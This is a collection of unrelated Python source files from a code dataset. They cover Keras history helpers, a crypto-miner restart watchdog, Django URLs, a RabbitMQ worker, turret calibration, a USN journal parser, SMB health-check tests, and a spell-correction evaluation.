    On the first call (when *history* has no usable ``history`` dict yet)
    the new history object *h* is returned unchanged.
    '''
    # Narrowed from a bare "except:" which also swallowed KeyboardInterrupt
    # and real programming errors.  The bootstrap cases are: history has no
    # .history attribute, a key is missing, or the value is not list-like.
    try:
        for key in ('loss', 'val_loss', 'acc', 'val_acc'):
            history.history[key] = history.history[key] + h.history[key]
    except (AttributeError, KeyError, TypeError):
        history = h
    return history
def unfreeze_layer_onwards(model, layer_name):
    '''
    Freeze every layer before *layer_name* and unfreeze it and all layers
    after it.  Returns the (mutated) model.
    '''
    trainable = False
    for layer in model.layers:
        # Narrowed from a bare "except:": only layers lacking a name or a
        # settable trainable attribute are skipped.
        try:
            if layer.name == layer_name:
                trainable = True
            layer.trainable = trainable
        except AttributeError:
            continue
    return model
#def plot_performance(history):
# '''
# This function plots the train & test accuracy, loss plots
# '''
#
# plt.subplot(1,2,1)
# plt.plot(history.history['acc'])
# plt.plot(history.history['val_acc'])
# plt.title('Accuracy v/s Epochs')
# plt.ylabel('Accuracy')
# plt.xlabel('Epoch')
# plt.legend(['train', 'test'], loc='upper left')
#
# plt.subplot(1,2,2)
# plt.plot(history.history['loss'])
# plt.plot(history.history['val_loss'])
# plt.title('Loss v/s Epochs')
# plt.ylabel('M.S.E Loss')
# plt.xlabel('Epoch')
# plt.legend(['train', 'test'], loc='upper left')
#
# plt.tight_layout()
# plt.show()
| StarcoderdataPython |
1723519 | <reponame>malja/check_miner<filename>check_miner.py
import requests
import psutil
import dns.resolver
import smtplib
from threading import Timer
import subprocess
from datetime import datetime
PROCESS_NAME = "EthDcrMiner64.exe"
MINER_ADDRESS = ""
PATH_TO_EXECUTABLE = ""
INTERVAL = 60*60
EMAIL_FROM = ""
EMAIL_TO = ""
EMAIL_SUBJECT = "Miner Watch"
EMAIL_MESSAGE = "Miner prestal tezit a byl restartovan."
class RepeatedTimer(object):
    """Invoke *function* every *interval* seconds on a background threading.Timer.

    The first timer is armed immediately on construction.  _run() re-arms
    the next timer *before* invoking the callback, so a long-running
    callback does not delay the following tick.
    """

    def __init__(self, interval, function, *args, **kwargs):
        self._timer = None
        self.interval = interval
        self.function = function
        self.args = args
        self.kwargs = kwargs
        self.is_running = False
        self.start()

    def _run(self):
        # Timer fired: clear the flag so start() re-arms, then call back.
        self.is_running = False
        self.start()
        self.function(*self.args, **self.kwargs)

    def start(self):
        # Arm a new one-shot Timer unless one is already pending.
        if not self.is_running:
            self._timer = Timer(self.interval, self._run)
            self._timer.start()
            self.is_running = True

    def stop(self):
        # Cancel the pending timer (if any) and stop rescheduling.
        self._timer.cancel()
        self.is_running = False
def send_rest_request(miner_address):
    """Query the ethermine.org API for the current stats of *miner_address*.

    Returns the decoded ``data`` payload on success, or False when the
    response is not valid JSON, is null, or reports no data.
    """
    print("Getting response from server...")
    api_address = "https://api.ethermine.org/miner/" + miner_address + "/currentStats"
    response = requests.get(api_address)
    try:
        json_data = response.json()
    except ValueError:
        # Body was not valid JSON (e.g. an HTML error page).
        print("Connection error...")
        json_data = None
    # "is None" replaces the previous "== None" identity-vs-equality misuse.
    if json_data is None:
        return False
    if json_data["status"] == "OK" and len(json_data["data"]) != 0:
        return json_data["data"]
    return False
def find_process_and_kill(process_name):
    """Kill the first running process named *process_name*.

    Returns True when a matching process was found and killed, else False.
    """
    print("Searching for specified process to be killed...")
    for proc in psutil.process_iter():
        # proc.name() can raise if the process exits between enumeration
        # and inspection, or if we lack permission; skip those entries
        # instead of aborting the whole scan.
        try:
            if proc.name() == process_name:
                print("Process found ...")
                proc.kill()
                return True
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue
    return False
def start_new_process( path ):
    """Launch the executable at *path* as a detached child process (fire-and-forget)."""
    subprocess.Popen( [ path ] )
def resolve_server_address(server):
    """Resolve the mail exchanger hostname for domain *server*.

    Returns the exchange hostname of the highest-priority MX record (the
    one with the lowest preference value), or False when the domain has
    no MX records.
    """
    answers = dns.resolver.query(server, 'MX')
    if not answers:
        return False
    # Bug fix: previously the first record in answer order was used; MX
    # semantics require preferring the lowest preference value.
    best = min(answers, key=lambda rdata: rdata.preference)
    return str(best.exchange)
def send_email(address_to, address_from, subject, message):
    """Deliver *message* directly to the recipient's MX server via SMTP.

    Returns True on success, False when the recipient domain cannot be
    resolved or the SMTP transaction fails.
    """
    try:
        server = resolve_server_address(address_to[address_to.find("@") + 1:])
    except dns.resolver.NXDOMAIN:
        return False
    # Bug fix: resolve_server_address() returns False when no MX record
    # exists; previously that value was passed straight to smtplib.SMTP.
    if not server:
        return False
    mailer = smtplib.SMTP(host=server)
    body = "From: {}\nTo: {}\nSubject:{}\n{}".format(address_from, address_to, subject, message)
    try:
        mailer.sendmail(address_from, address_to, body)
    except smtplib.SMTPException:
        return False
    return True
def run():
    """Poll the miner API once; if the worker is down, restart it and e-mail an alert."""
    print("Checking response from API server...")
    response = send_rest_request( MINER_ADDRESS )
    if ( response == False ):
        print( datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " Worker is not mining...")
        # Kill any stale miner process, relaunch the executable, notify.
        find_process_and_kill( PROCESS_NAME )
        start_new_process( PATH_TO_EXECUTABLE )
        send_email( EMAIL_TO, EMAIL_FROM, EMAIL_SUBJECT, EMAIL_MESSAGE )
    else:
        print(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " Everything is fine...")
###############################################################################
## CODE ITSELF
###############################################################################

print("Starting...")
# Re-check the miner every INTERVAL seconds on a background timer thread.
rt = RepeatedTimer( INTERVAL , run )

try:
    # Foreground loop: read commands from stdin until told to quit.
    while True:
        user_input = input()
        if ( user_input == "q" or user_input == "exit" or user_input == "quit" ):
            print("Quiting")
            rt.stop()
            break
finally:
    # Always cancel the background timer so the process can exit cleanly.
    rt.stop()
| StarcoderdataPython |
194853 | # -*- coding: utf-8 -*-
import django
from django.conf.urls import include, url
from django.contrib import admin
from django.conf import settings
from django.http import HttpResponse
import django.views.static
import example.testapp.views
admin.autodiscover()
def handle404(request):
    """Custom 404 handler returning the error code as the response body."""
    # Bug fix: previously returned HTTP 200; a not-found handler should
    # respond with status 404.
    return HttpResponse('404', status=404)
def handle500(request):
    """Custom 500 handler returning the error code as the response body."""
    # Bug fix: the body previously said '404' (copy/paste error) and the
    # status was 200; a server-error handler should respond 500.
    return HttpResponse('500', status=500)
# Dotted paths to the custom error views defined above.
handler404 = 'example.urls.handle404'
handler500 = 'example.urls.handle500'

# Django < 1.9 requires wrapping admin.site.urls in include().
if django.VERSION < (1, 9):
    urlpatterns = [url(r'^admin/', include(admin.site.urls), name="admin")]
else:
    urlpatterns = [url(r'^admin/', admin.site.urls, name="admin")]

urlpatterns += [
    url(r'^media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
    url(r'^parkingarea/(?P<pk>\d+)/$', example.testapp.views.parkingarea_update, name='parkingarea'),
    url(r'^', include('django.contrib.staticfiles.urls')),
]
| StarcoderdataPython |
51776 | #!/usr/bin/env python3
import os
import sys
import json
import configparser
import logging
import logging.config
import traceback
# install required package if in docker
if os.geteuid() == 0:
import pkgutil
import subprocess
required_pkgs = ["pytz"]
for pkg in required_pkgs:
if not pkgutil.find_loader(pkg):
p = subprocess.Popen(["pip3","install", pkg], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
import helper
import handler_basic
import handler_byline
import handler_lab
import handler_score
APP_VERSION = 4
if "WORKER_ID" in os.environ:
WORKER_ID = os.environ["WORKER_ID"]
else:
raise SystemExit("Environment variable 'WORKER_ID' is not found.")
if WORKER_ID == "dev":
logging.config.fileConfig('logging.conf')
helper.eventlog.enable_local_echo()
logger = logging.getLogger("basic")
helper.mongo.connect()
def update_self_then_restart():
    """Close resources and exit with code 99 so the supervisor pulls updates and restarts."""
    helper.mongo.close()
    if WORKER_ID == "dev":
        # Never self-update the local development worker.
        raise SystemExit("NoUpdate if dev")
    #script_path = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), "gitpull_then_restart.sh")
    #subprocess.Popen([script_path])
    #raise SystemExit("Exit for self-update")
    # return code 99 will execute "git pull"
    print("Exit for update and restart")
    sys.exit(99)
def get_safe_param(jobj, pname):
    """Return jobj[pname] when the key exists, otherwise None (missing-key safe)."""
    return jobj[pname] if pname in jobj else None
def on_notice(raw_body):
    """Handle a control message from the notice queue (exit / update / ping)."""
    #print("Got notice", raw_body)
    # Malformed JSON or a missing "cmd" field is logged and ignored.
    try:
        task_spec = json.loads(raw_body.decode("utf-8"))
        cmd = task_spec["cmd"]
    except:
        logger.error("Invalid notice json: %r", raw_body)
        return
    if cmd == "exit":
        logger.info("Got exit command from RabbitMQ channel")
        helper.rabbit.stop()
    elif cmd == "update":
        update_self_then_restart()
    elif cmd == "ping":
        # Echo the ping parameter back through the event log.
        logger.info("Got ping command: " + get_safe_param(task_spec, "param"))
        helper.eventlog.info("PONG " + get_safe_param(task_spec, "param"))
    else:
        logger.error("Unknown notice cmd: %s", cmd)
def on_task(raw_body):
    """Dispatch one work item from the task queue to the matching handler."""
    #print("Got task", raw_body)
    # Malformed JSON / missing fields are logged and the message dropped.
    try:
        task_spec = json.loads(raw_body.decode("utf-8"))
        cmd = task_spec["cmd"]
        ver = int(task_spec["ver"])
    except:
        logger.error("Invalid task json: %r", raw_body)
        return
    try:
        if cmd == "basic":
            handler_basic.process_basic_measurements(ver, task_spec)
        elif cmd == "score":
            handler_score.process_score_all(ver, task_spec)
        elif cmd == "byline":
            handler_byline.process_byline_extract(ver, task_spec) # no longer used
        elif cmd == "lab_split":
            handler_lab.process_split(ver, task_spec)
        elif cmd == "lab_postag":
            handler_lab.process_postag(ver, task_spec)
        elif cmd == "lab_sanitize":
            handler_lab.process_sanitize(ver, task_spec)
        elif cmd == "lab_metric":
            handler_lab.process_metric(ver, task_spec)
        elif cmd == "lab_trust":
            handler_lab.process_trust(ver, task_spec)
        elif cmd == "lab_integrate":
            handler_lab.process_integrate(ver, task_spec)
        else:
            logger.error("Unknown task cmd: %s", cmd)
            helper.eventlog.error("Unknown task cmd: %s" % cmd)
    except Exception as ex:
        # Report handler failures to the shared event log with the article id.
        newsId = task_spec["newsId"] if "newsId" in task_spec else "NoNews"
        #ex_type, ex_value, ex_traceback = sys.exc_info()
        #print("에러(%s,%s): %s,%s" % (cmd, newsId, ex_value.filename, ex_value.strerror))
        helper.eventlog.fatal("에러(%s,%s): %s" % (cmd, newsId, str(ex)))
helper.eventlog.set_worker_id(WORKER_ID)
if WORKER_ID != "dev":
    helper.eventlog.trace("Worker %s started (%d)" % (WORKER_ID, APP_VERSION))
logger.debug("Worker [%s] started (%d, %s)", WORKER_ID, APP_VERSION, os.environ["MQ_URL"])

# if __name__ == '__main__':
    # handler_basic.process_basic_measurements(1, {"newsId":"02100101.20160630120514682"})
    # handler_score.process_score_all(1, {"newsId":"02100101.20160630120514682"})
    # on_task({"cmd":"basic", "ver":"1", "newsId":"01101001.20160601133622578"})

# Apply updated weights -> article scores (asStats)
# coll_stat = helper.mongo.get_collection("asStats")
# docs = coll_stat.find({})
# for doc in docs:
#     handler_score.process_score_all(1, {"newsId":doc["news_id"]})
#     #print(doc["news_id"], doc["title"])

# Apply updated weights -> processed articles (news)
# coll_news = helper.mongo.get_collection("news")
# docs = coll_news.find({})
# for doc in docs:
#     handler_basic.process_basic_measurements(1, {"newsId":doc["newsId"]})
#     print(doc["newsId"], doc["title"])

# Main loop: consume the RabbitMQ queues until stopped (Ctrl-C included).
try:
    helper.rabbit.set_notice_handler(on_notice)
    helper.rabbit.set_task_handler(on_task)
    helper.rabbit.run(os.environ["MQ_URL"])
except KeyboardInterrupt:
    helper.rabbit.stop()

logger.debug("Worker [%s] stopped.", WORKER_ID)
| StarcoderdataPython |
111175 | <filename>components/Actuators/HighLevel/turretCalibrate.py
from magicbot import StateMachine, feedback, state
from rev import SparkMaxLimitSwitch
from components.Actuators.LowLevel.turretThreshold import TurretThreshold
from networktables import NetworkTables as networktable
class CalibrateTurret(StateMachine):
    """Magicbot state machine that calibrates the turret's travel limits.

    The turret is driven (optionally under motor power) until the right
    (forward) limit switch trips; that encoder position becomes the right
    deadzone, the left deadzone is derived by subtracting *offset*, and
    both limits are published to the SmartDashboard NetworkTable.
    """
    compatString = ["teapot"]
    turretThreshold: TurretThreshold
    limitTable = networktable.getTable("SmartDashboard")
    # Fixed travel between the right and left limits, in the same units as
    # turretThreshold.getPosition() -- NOTE(review): presumably encoder
    # units/degrees; confirm against the turret hardware.
    offset = 206
    limitL = None
    limitR = None
    useMotor = False

    def setup(self):
        # Cache the SparkMax limit switches (normally-open wiring).
        turretMotor = self.turretThreshold.turretMotor
        self.forwardLimitSwitch = turretMotor.getForwardLimitSwitch(SparkMaxLimitSwitch.Type.kNormallyOpen)
        self.reverseLimitSwitch = turretMotor.getReverseLimitSwitch(SparkMaxLimitSwitch.Type.kNormallyOpen)

    def setUseMotor(self, motor:bool):
        """
        Determines whether we use motor or not during calibration.
        """
        self.useMotor = motor

    @feedback
    def getLeftClicked(self):
        # Reverse (left) limit switch state.
        return self.reverseLimitSwitch.get()

    @feedback
    def getRightClicked(self):
        # Forward (right) limit switch state.
        return self.forwardLimitSwitch.get()

    @state(first = True)
    def findRightdeadzone(self):
        """Seek toward the right limit switch; on trip, record both deadzones."""
        if self.getRightClicked():
            self.limitR = self.turretThreshold.getPosition()
            self.limitL = self.limitR - self.offset
            self.foundDeadzones()
        else:
            if self.useMotor:
                self.turretThreshold.setTurretspeed(self.turretThreshold.calibSpeed)
            self.turretThreshold.setCalibrating(True)
            # Re-enter this state on the next control loop iteration.
            self.next_state("findRightdeadzone")

    def foundDeadzones(self):
        """Stop calibrating, store the measured limits, and publish them."""
        self.turretThreshold.setCalibrating(False)
        # NOTE(review): the speed is only zeroed when "calibrated" is still
        # False -- confirm that turretThreshold.calibrated reflects the
        # pre-calibration state here.
        if not self.turretThreshold.calibrated:
            self.turretThreshold.setTurretspeed(0)
        self.turretThreshold.setDeadzones(self.limitL, self.limitR)
        self.limitTable.putNumber("Left Limit", self.limitL)
        self.limitTable.putNumber("Right Limit", self.limitR)
        self.done()
| StarcoderdataPython |
3361987 | <gh_stars>0
#referred https://github.com/mammothb/symspellpy
import os
from collections import Counter
from symspellpy.symspellpy import SymSpell, Verbosity # import the module
import pickle as pkl
def read_qspell():
    """Load the Webis QSpell corpus.

    Each line is ';'-separated: an id, the raw query, then zero or more
    gold corrections. Prints the path, query count and a histogram of
    corrections-per-query, then returns (queries, corrections).
    """
    path = '../corpus-webis-qspell-17.csv'
    queries = []
    corrections = []
    with open(path) as handle:
        for raw in handle:
            fields = raw.strip().rstrip(';').split(';')
            queries.append(fields[1])
            corrections.append(fields[2:])
    print(path, len(queries), Counter(len(c) for c in corrections))
    return queries, corrections
def read_jdb():
    """Load the JDB v1.0 corpus: the train file plus all three test splits.

    The three test splits are concatenated into a single test set.
    Returns (train_queries, train_gold, test_queries, test_gold).
    """
    train_data, train_pred = read_jdb_input_file('../v1.0/train.txt')
    test_data, test_pred = [], []
    for split_path in ('../v1.0/test-split1.txt',
                       '../v1.0/test-split2.txt',
                       '../v1.0/test-split3.txt'):
        split_data, split_pred = read_jdb_input_file(split_path)
        test_data.extend(split_data)
        test_pred.extend(split_pred)
    print("Train:", len(train_data))
    print("Test:", len(test_data))
    return train_data, train_pred, test_data, test_pred
def read_jdb_input_file(file):
    """Read one tab-separated corpus file.

    Each line holds a raw query followed by zero or more gold corrections.
    Prints the path, query count and a histogram of corrections-per-query,
    then returns (queries, corrections).
    """
    queries = []
    corrections = []
    with open(file) as handle:
        for raw in handle:
            fields = raw.strip().split('\t')
            queries.append(fields[0])
            corrections.append(fields[1:])
    print(file, len(queries), Counter(len(c) for c in corrections))
    return queries, corrections
def read_end2end(flag=0):
    """Load the end-to-end query corpus from ./end_to_end_queries.tsv.

    Each tab-separated line holds a raw query followed by its gold
    corrections. When ``flag == 1`` the raw queries are also written, one
    per line, to ./end_queries.txt.

    Args:
        flag: 1 to additionally dump the raw queries to ./end_queries.txt.

    Returns:
        tuple(list[str], list[list[str]]): queries and their corrections.
    """
    file = './end_to_end_queries.tsv'
    data = []
    valid = []
    lens = []
    single_file = './end_queries.txt'
    # Bug fix: the output handle was opened but never closed, so buffered
    # lines could be lost. The with-block preserves the original
    # truncate-on-open behaviour (the dump file is opened regardless of
    # ``flag``) while guaranteeing flush and close.
    with open(single_file, 'w') as s_file, open(file) as f:
        for line in f:
            part = line.strip().split('\t')
            data.append(part[0])
            valid.append(part[1:])
            lens.append(len(valid[-1]))
            if flag == 1:
                s_file.write(part[0])
                s_file.write('\n')
    print(file, len(data), Counter(lens))
    return data, valid
def read_trec_input():
    """Load the TREC query corpus from ./data.txt.

    Each tab-separated line holds a raw query followed by zero or more gold
    corrections. Prints the path, query count and a histogram of
    corrections-per-query, then returns (queries, corrections).
    """
    path = './data.txt'
    queries = []
    corrections = []
    with open(path) as handle:
        for raw in handle:
            fields = raw.strip().split('\t')
            queries.append(fields[0])
            corrections.append(fields[1:])
    print(path, len(queries), Counter(len(c) for c in corrections))
    return queries, corrections
def run_eval(data, prediction, valid):
    """Score *prediction* against the gold corrections *valid*.

    Only queries whose original form is NOT already a gold correction count
    toward the accuracy denominator; queries that were already correct are
    folded back in for the "modified" accuracy.

    Returns:
        tuple(float, float, float): (accuracy over changed queries,
        modified accuracy over all queries, fraction already correct).
    """
    num_data = len(prediction)
    # The 0.1 seeds keep every ratio finite when a count would be zero.
    changed = 0.1   # queries whose raw form was not already a gold answer
    correct = 0.1   # predictions matching a gold answer
    for i, guess in enumerate(prediction):
        if data[i] not in valid[i]:
            print(data[i], '\t', guess, '\t', valid[i])
            changed += 1
        if guess in valid[i]:
            correct += 1
    print(changed, ' out of ', num_data, ' not in the input')
    print(correct, ' out of ', changed, ' correct\n')
    already_ok = num_data - changed + 0.1
    mod_acc = (correct + already_ok) / num_data
    return correct / changed, mod_acc, already_ok / num_data
def run_symsp(data, file, Y):
    """Spell-correct every query in *data* with SymSpell's compound lookup.

    Writes one corrected query per line to *file* and logs every prediction
    that misses the gold set to 'wrong' + file[2:] (the path is assumed to
    start with './' — TODO confirm for all callers).

    Args:
        data: list of (possibly misspelled) query strings.
        file: output path for the corrected queries.
        Y: list of gold-correction lists, parallel to *data*.

    Returns:
        list[str] of corrected queries, or None when the frequency
        dictionary cannot be loaded.
    """
    # SymSpell setup parameters.
    initial_capacity = 83000
    # maximum edit distance per dictionary precalculation
    max_edit_distance_dictionary = 2
    prefix_length = 7
    sym_spell = SymSpell(initial_capacity, max_edit_distance_dictionary,
                         prefix_length)
    # Load the English unigram frequency dictionary shipped next to this file.
    dictionary_path = os.path.join(os.path.dirname(__file__),
                                   "frequency_dictionary_en_82_765.txt")
    term_index = 0  # column of the term in the dictionary text file
    count_index = 1  # column of the term frequency in the dictionary text file
    if not sym_spell.load_dictionary(dictionary_path, term_index, count_index):
        print("Dictionary file not found")
        return
    # max edit distance per lookup (per single word, not per whole input string)
    max_edit_distance_lookup = 2
    pred = []
    # Bug fix: f_wrong was never closed and f only closed on the happy path,
    # risking lost buffered writes; with-blocks guarantee flush + close.
    with open('wrong' + file[2:], 'w') as f_wrong, open(file, 'w') as f:
        for i, input_term in enumerate(data):
            suggestions = sym_spell.lookup_compound(input_term,
                                                    max_edit_distance_lookup)
            # lookup_compound appears to yield a single best suggestion per
            # query; the loop keeps the library's list-shaped return.
            for suggestion in suggestions:
                pred.append(suggestion.term)
                f.write(suggestion.term)
                f.write('\n')
                if suggestion.term not in Y[i]:
                    # Log query / suggestion / gold corrections for analysis.
                    f_wrong.write(input_term)
                    f_wrong.write('\t')
                    f_wrong.write(suggestion.term)
                    f_wrong.write('\t')
                    f_wrong.write('\t'.join(Y[i]))
                    f_wrong.write('\n')
    return pred
def predict_all():
    """Run SymSpell over every corpus and pickle the predictions.

    Side effects: writes *_op*.txt prediction files, wrong*.txt mismatch
    logs and .pkl prediction caches into the current directory.
    """
    X, Y, test_x, test_y = read_jdb()
    # JDB: test split, train split, then train+test combined.
    test_x_pred = run_symsp(test_x, './jdb_op_test.txt', test_y)
    with open('./jdb_test.pkl', 'wb') as handle:
        pkl.dump(test_x_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
    X_pred = run_symsp(X, './jdb_op_train.txt', Y)
    with open('./jdb.pkl', 'wb') as handle:
        pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
    X.extend(test_x)
    Y.extend(test_y)
    X_pred = run_symsp(X, './jdb_op_all.txt', Y)
    with open('./jdb_all.pkl', 'wb') as handle:
        pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
    # TREC corpus.
    X, Y = read_trec_input()
    X_pred = run_symsp(X, './op.txt', Y)
    with open('./trec.pkl', 'wb') as handle:
        pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
    # QSpell corpus.
    X, Y = read_qspell()
    X_pred = run_symsp(X, './qspell_op.txt', Y)
    with open('./qspell.pkl', 'wb') as handle:
        pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
    # End-to-end corpus.
    X, Y = read_end2end()
    X_pred = run_symsp(X, './end_op.txt', Y)
    with open('./end.pkl', 'wb') as handle:
        pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
def eval_all():
    """Score the pickled SymSpell predictions for every corpus.

    Expects predict_all() to have produced the .pkl caches already.
    """
    X, Y, test_x, test_y = read_jdb()
    # Baseline: score the raw queries against the gold corrections.
    print('Base: ', run_eval(X, X, Y))
    with open('./jdb_all.pkl', 'rb') as handle:
        pred_load = pkl.load(handle)
    X.extend(test_x)
    Y.extend(test_y)
    print('Method X : ', run_eval(X, pred_load, Y))
    with open('./jdb.pkl', 'rb') as handle:
        pred_load = pkl.load(handle)
    # NOTE(review): jdb.pkl holds train-only predictions but is scored here
    # against the extended (train+test) lists; run_eval only iterates
    # len(prediction), so this effectively scores the train slice — confirm
    # that is intended.
    print('Method X : ', run_eval(X, pred_load, Y))
    with open('./jdb_test.pkl', 'rb') as handle:
        pred_test_load = pkl.load(handle)
    print('Method,test: ', run_eval(test_x, pred_test_load, test_y))
    X, Y = read_trec_input()
    with open('./trec.pkl', 'rb') as handle:
        pred_trec_load = pkl.load(handle)
    print('Method X: ', run_eval(X, pred_trec_load, Y))
    X, Y = read_qspell()
    with open('./qspell.pkl', 'rb') as handle:
        pred_qspell_load = pkl.load(handle)
    print('Method X: ', run_eval(X, pred_qspell_load, Y))
    X, Y = read_end2end()
    with open('./end.pkl', 'rb') as handle:
        pred_qspell_load = pkl.load(handle)
    print('Method X: ', run_eval(X, pred_qspell_load, Y))
# Script entry point: generate predictions for every corpus, then score them.
# NOTE(review): these run at import time; consider restoring the commented
# `if __name__ == "__main__": main()` guard.
predict_all()
eval_all()
# def read_dict(file):#reading birbeck dictionary of misspelled words
# # file='./missp/missp.dat'
# dict_word={}
# with open(file,'r') as f:
# for line in f:
# word=line.strip()
# if '$' in word:
# key=word[1:]
# else:
# if word not in dict_word:
# dict_word[word]=key
# return dict_word
# def read_dict_h(file):#reading birbeck dictionary of misspelled words
# dict_word={}
# with open(file,'r') as f:
# for line in f:
# word=line.strip()
# print(word)
# if '$' in word:
# key=word[1:]
# else:
# if word not in dict_word:
# dict_word[word]=key
# return dict_word
# def run_dictmethod(X):
# pred=[]
# for query in X:
# modified_query=[]
# for word in query.split():
# if word in birbeck:
# modified_query.append(birbeck[word])
# else:
# modified_query.append(word)
# pred.append(' '.join(modified_query))
# return pred
# def read_all_dict():
# birbeck=read_dict('./missp/missp.dat')
# # birbeck=read_dict('./missp/missp.dat')
# aspell=read_dict('./missp/aspell.dat')
# # print(aspell)
# wiki=read_dict('./missp/wikipedia.dat')
# # print(wiki)
# holbrook=read_dict_h('./missp/holbrook-missp.dat')
# birbeck.update(aspell)
# birbeck.update(wiki)
# print(birbeck)
# print(len(birbeck))
# return birbeck
# def dict_method():
# X,Y,test_x,test_y=read_jdb()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X.extend(test_x)
# Y.extend(test_y)
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X,Y=read_trec_input()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X,Y=read_qspell()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# dict_method()
# birbeck=read_all_dict()
# dict_method()
| StarcoderdataPython |
67762 | # -*- coding: utf-8 -*-
"""USN change journal records."""
import os
from dtformats import data_format
class USNRecords(data_format.BinaryDataFile):
  """USN change journal records."""

  # Using a class constant significantly speeds up the time required to load
  # the dtFabric definition file.
  _FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('usn_journal.yaml')

  # (attribute, description, formatter) triples used to render a version 2
  # record in debug output.
  _DEBUG_INFO_RECORD_V2 = [
      ('size', 'Size', '_FormatIntegerAsDecimal'),
      ('major_version', 'Major version', '_FormatIntegerAsDecimal'),
      ('minor_version', 'Minor version', '_FormatIntegerAsDecimal'),
      ('file_reference', 'File reference', '_FormatIntegerAsHexadecimal8'),
      ('parent_file_reference', 'Parent file reference',
       '_FormatIntegerAsHexadecimal8'),
      ('timestamp', 'Timestamp', '_FormatIntegerAsFiletime'),
      ('update_reason_flags', 'Update reason flags',
       '_FormatIntegerAsHexadecimal8'),
      ('update_source_flags', 'Update source flags',
       '_FormatIntegerAsHexadecimal8'),
      ('security_descriptor_entry', 'Security descriptor entry',
       '_FormatIntegerAsDecimal'),
      ('file_attribute_flags', 'File attribute flags',
       '_FormatIntegerAsHexadecimal8'),
      ('name_size', 'Name size', '_FormatIntegerAsDecimal'),
      ('name_offset', 'Name offset', '_FormatIntegerAsDecimal'),
      ('name', 'Name', '_FormatString')]

  # A zeroed 60-byte header marks unused (padding) space in a journal block.
  _EMPTY_USN_RECORD_HEADER = bytes([0] * 60)

  def _ReadRecordV2(self, file_object):
    """Reads a version 2 USN record.

    Args:
      file_object (file): file-like object.

    Returns:
      tuple[usn_record_v2, int]: USN record and number of bytes read.

    Raises:
      ParseError: if the record cannot be read.
    """
    file_offset = file_object.tell()
    data_type_map = self._GetDataTypeMap('usn_record_v2')

    usn_record, data_size = self._ReadStructureFromFileObject(
        file_object, file_offset, data_type_map, 'USN record (version 2)')

    if self._debug:
      self._DebugPrintStructureObject(usn_record, self._DEBUG_INFO_RECORD_V2)

    return usn_record, data_size

  def ReadFileObject(self, file_object):
    """Reads a file-like object containing USN change journal records.

    Args:
      file_object (file): file-like object.

    Raises:
      ParseError: if the file cannot be read.
    """
    self._file_object = file_object

  def ReadRecords(self):
    """Reads USN change journal records.

    Yields:
      usn_record_v2: USN record.

    Raises:
      ParseError: if a record cannot be read.
    """
    self._file_object.seek(0, os.SEEK_SET)

    file_offset = 0
    while file_offset < self._file_size:
      # Records are grouped into 4096-byte blocks.
      block_size = 4096
      if block_size > self._file_size:
        block_size = self._file_size
      # NOTE(review): block_size is clamped to the total file size, not to
      # the bytes remaining after file_offset — confirm journal files are
      # always 4096-aligned.

      while block_size > 60:
        # Peek at the next 60 bytes; all zeroes means the remainder of the
        # block is padding.
        usn_record_header = self._file_object.read(60)
        if usn_record_header == self._EMPTY_USN_RECORD_HEADER:
          break

        self._file_object.seek(-60, os.SEEK_CUR)

        usn_record, data_size = self._ReadRecordV2(self._file_object)
        yield usn_record

        file_offset += data_size
        block_size -= data_size

      # Skip whatever padding is left in the current block.
      file_offset += block_size
| StarcoderdataPython |
3228885 | <gh_stars>0
import os
import os.path
import pyndows
from pyndows.testing import samba_mock, SMBConnectionMock
class DateTimeMock:
    """Stand-in for the datetime class that always reports the same instant.

    Lets tests pin the timestamps pyndows embeds in health-check payloads.
    """

    _FROZEN_ISO = "2018-10-11T15:05:05.663979"

    @staticmethod
    def utcnow():
        """Return a stub whose isoformat() yields the frozen timestamp."""
        class _FrozenMoment:
            @staticmethod
            def isoformat():
                return DateTimeMock._FROZEN_ISO
        return _FrozenMoment
def test_pass_health_check(samba_mock: SMBConnectionMock, monkeypatch):
    """Health check reports 'pass' when the share answers the SMB echo."""
    # Freeze pyndows' notion of "now" so the reported timestamp is stable.
    monkeypatch.setattr(pyndows._windows, "datetime", DateTimeMock)
    connection = pyndows.connect(
        "TestComputer", "127.0.0.1", 80, "TestDomain", "TestUser", "TestPassword"
    )
    # Register an (empty) echo reply on the mock so the probe succeeds.
    samba_mock.echo_responses[b""] = b""
    assert pyndows.check("tests", connection) == (
        "pass",
        {
            "tests:echo": {
                "componentType": "TestComputer",
                "observedValue": "",
                "status": "pass",
                "time": "2018-10-11T15:05:05.663979",
            }
        },
    )
def test_fail_health_check(samba_mock: SMBConnectionMock, monkeypatch):
    """Health check reports 'fail' when the SMB echo has no mocked reply."""
    # Freeze pyndows' notion of "now" so the reported timestamp is stable.
    monkeypatch.setattr(pyndows._windows, "datetime", DateTimeMock)
    connection = pyndows.connect(
        "TestComputer", "127.0.0.1", 80, "TestDomain", "TestUser", "TestPassword"
    )
    # No echo response is registered on the mock, so the probe must fail.
    assert pyndows.check("tests", connection) == (
        "fail",
        {
            "tests:echo": {
                "componentType": "TestComputer",
                "status": "fail",
                "time": "2018-10-11T15:05:05.663979",
                "output": f"Mock for echo failure.{os.linesep}",
            }
        },
    )
| StarcoderdataPython |
1622704 | <reponame>cyphyhouse/KoordLanguage
from src.harness.agentThread import AgentThread
class Task:
def __init__(self):
self.loc = None
self.assignId = None
self.taskId = None
class DefaultName(AgentThread):
    """Koord agent thread that repeatedly claims an available task, plans a
    route to it, and publishes the route when it will not collide."""

    def __init__(self, config, motion_config):
